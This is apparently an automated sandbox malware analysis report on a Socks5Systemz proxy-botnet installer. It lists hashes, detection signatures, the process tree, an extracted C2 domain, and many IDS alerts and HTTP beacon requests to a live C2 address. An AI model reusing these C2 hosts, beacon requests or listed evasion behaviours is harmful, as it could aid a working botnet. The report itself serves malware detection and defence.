Windows Analysis Report
j9htknb7BQ.exe

Overview

General Information

Sample name: j9htknb7BQ.exe
renamed because original name is a hash value
Original sample name: 168a4450eaf205fa20bcc2d0881c830f.exe
Analysis ID: 1575008
MD5: 168a4450eaf205fa20bcc2d0881c830f
SHA1: 32e77548315c9d48409057ea43e59ec4be060587
SHA256: 77b07095ae775cc151b3c35088384ba9dcc722b2b5fcee7fa5a933141db67b26
Tags: exe, Socks5Systemz, user-abuse_ch

Detection

Petite Virus, Socks5Systemz
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Petite Virus
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
PE file has nameless sections
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • j9htknb7BQ.exe (PID: 2796 cmdline: "C:\Users\user\Desktop\j9htknb7BQ.exe" MD5: 168A4450EAF205FA20BCC2D0881C830F)
    • j9htknb7BQ.tmp (PID: 6536 cmdline: "C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp" /SL5="$20464,6991381,54272,C:\Users\user\Desktop\j9htknb7BQ.exe" MD5: F448D7F4B76E5C9C3A4EAFF16A8B9B73)
      • schtasks.exe (PID: 4564 cmdline: "C:\Windows\system32\schtasks.exe" /Query MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crtgame.exe (PID: 6556 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -i MD5: BB0124F16D88C4EC1FCFD9E524A5B921)
      • net.exe (PID: 5680 cmdline: "C:\Windows\system32\net.exe" helpmsg 10 MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 6784 cmdline: C:\Windows\system32\net1 helpmsg 10 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • crtgame.exe (PID: 5460 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -s MD5: BB0124F16D88C4EC1FCFD9E524A5B921)
  • cleanup
{"C2 list": ["bhdmpwg.com"]}
Source | Rule | Description | Author | Strings
C:\Program Files (x86)\CRTGame\bin\x86\is-VNLOG.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security |
C:\Program Files (x86)\CRTGame\bin\x86\is-QRNOQ.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security |
C:\Program Files (x86)\CRTGame\bin\x86\is-M6FGJ.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security |
C:\Program Files (x86)\CRTGame\bin\x86\is-PA44V.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security |
C:\Program Files (x86)\CRTGame\bin\x86\is-OMTUV.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security |
Source | Rule | Description | Author | Strings
00000007.00000002.3304692067.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
00000007.00000002.3304521371.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
Process Memory Space: crtgame.exe PID: 5460 | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |

No Sigma rule has matched

                  AV Detection

Source: j9htknb7BQ.exe | Avira: detected
Source: crtgame.exe.5460.7.memstrmin | Malware Configuration Extractor: Socks5Systemz {"C2 list": ["bhdmpwg.com"]}
Source: j9htknb7BQ.exe | ReversingLabs: Detection: 39%
Source: j9htknb7BQ.exe | Virustotal: Detection: 58%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_0045C8A8 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045C8A8
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_0045C95C ArcFourCrypt,1_2_0045C95C
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_0045C974 ArcFourCrypt,1_2_0045C974
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_10001130 ArcFourCrypt,1_2_10001130

                  Compliance

Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Unpacked PE file: 5.2.crtgame.exe.400000.0.unpack
Source: j9htknb7BQ.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb source: is-U01MD.tmp.1.dr
Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-MGR1O.tmp.1.dr
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_004520C0 FindFirstFileA,GetLastError,1_2_004520C0
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose,1_2_00473F08
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00496568
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463404
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463880
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose,1_2_00461E78

                  Networking

Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49841 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49841 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49835 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49835 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49814 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49825 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49825 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49814 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49805 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49805 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49788 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49861 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49788 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49861 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49876 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49876 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49866 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49866 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49872 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49872 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49823 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49886 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49886 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49823 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49847 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49852 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49852 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49847 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49882 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49890 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49890 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49882 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49911 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49911 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49905 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49905 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49921 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49921 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49915 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49915 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49901 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49901 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49936 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49936 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49926 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49926 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49930 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49856 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49930 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49856 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49895 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49808 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49808 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49895 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49944 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49962 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49957 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49962 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49957 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49966 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49951 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49951 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49944 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49966 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49972 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49972 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49986 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49986 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49976 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49982 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49976 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49982 -> 94.232.249.187:80
                  Source: Malware configuration extractorURLs: bhdmpwg.com
                  Source: global trafficTCP traffic: 192.168.2.5:49795 -> 46.8.225.74:2023
                  Source: Joe Sandbox ViewASN Name: INT-PDN-STE-ASSTEPDNInternalASSY INT-PDN-STE-ASSTEPDNInternalASSY
                  Source: global traffic | HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf07fe19cc HTTP/1.1 | Host: bhdmpwg.com | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global traffic | HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1 | Host: bhdmpwg.com | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknown | UDP traffic detected without corresponding DNS query: 81.31.197.38
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 7_2_02BC2B95 WSASetLastError,WSARecv,WSASetLastError,select,7_2_02BC2B95
                  Source: global traffic | HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568edf07fe19cc HTTP/1.1 | Host: bhdmpwg.com | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global traffic | HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1 | Host: bhdmpwg.com | User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10cad85bbb24 HTTP/1.1Host: bhdmpwg.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficDNS traffic detected: DNS query: bhdmpwg.com
                  Source: crtgame.exe, 00000007.00000002.3303589391.00000000008BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.232.
                  Source: crtgame.exe, 00000007.00000002.3303589391.0000000000899000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde2
                  Source: crtgame.exe, 00000007.00000002.3303589391.00000000008BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde2
